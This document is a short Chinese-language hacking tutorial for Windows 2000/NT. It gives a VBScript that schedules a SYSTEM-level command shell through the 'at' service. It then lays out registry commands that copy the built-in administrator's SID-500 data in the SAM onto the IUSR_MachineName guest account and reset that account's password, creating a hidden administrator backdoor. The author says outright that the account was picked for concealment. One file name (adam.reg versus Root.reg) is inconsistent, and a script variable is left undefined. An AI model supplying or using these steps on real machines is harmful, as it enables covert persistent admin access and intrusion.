首先要知道的概念是在Windows 2000和Windows NT,預設管理員帳號的SID
是固定的500(0x1f4),那麼我們可以用機器裡已經存在的一個帳號將SID為
500的帳號進行複製,在這裡我選擇的帳號是IUSR_MachineName(當然,為了
加強隱蔽性,我們選擇了這個帳號,所有帳號都可以用以下的方法,只不過這
個帳號較常見罷了),測試環境為Windows 2000 Server。
執行一個System的CMD Shell
'================================================================
On Error Resume Next
Set objNet = WScript.CreateObject( "WScript.Network"
)
Set ServiceObj = GetObject("WinNT://" & objNet.ComputerName
& "/schedule")
if ServiceObj.Status=1 then
ServiceObj.start
end if
aHour = hour(now)
aMinute = minute(now)+"1"
set wshshell = createobject ("wscript.shell")
wshshell.run ("at " & aHour & ":" & aMinute
& ":" & aSecond & " " &
"/interactive cmd.exe")
Wscript.echo "Waiting for the cmd window for NT
AUTHORITY\SYSTEM at " & aHour & ":" & aMinute
& "..."
'================================================================
或使用 psu.exe,然後在該CMD Shell裡面執行
regedit /e adam.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
這樣我們將SID 為500的管理員帳號的相關資料匯出,然後編輯adam.reg檔案,
將adam.reg檔案的第三行.....
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最後的"1F4"修改為
IUSR_MachineName的SID(大部分的機器該帳號的SID都為0x3E9,如果機器在最初安裝的時候沒有安裝IIS,而自己建了帳號後再安裝IIS就有可能不是這個值),將Root.reg檔案中的"1F4"修改為"3E9"後執行
regedit /s adam.reg 匯入該Reg檔案
然後執行
net user IUSR_MachineName Sphone 修改IUSR_MachineName的密碼......完成
|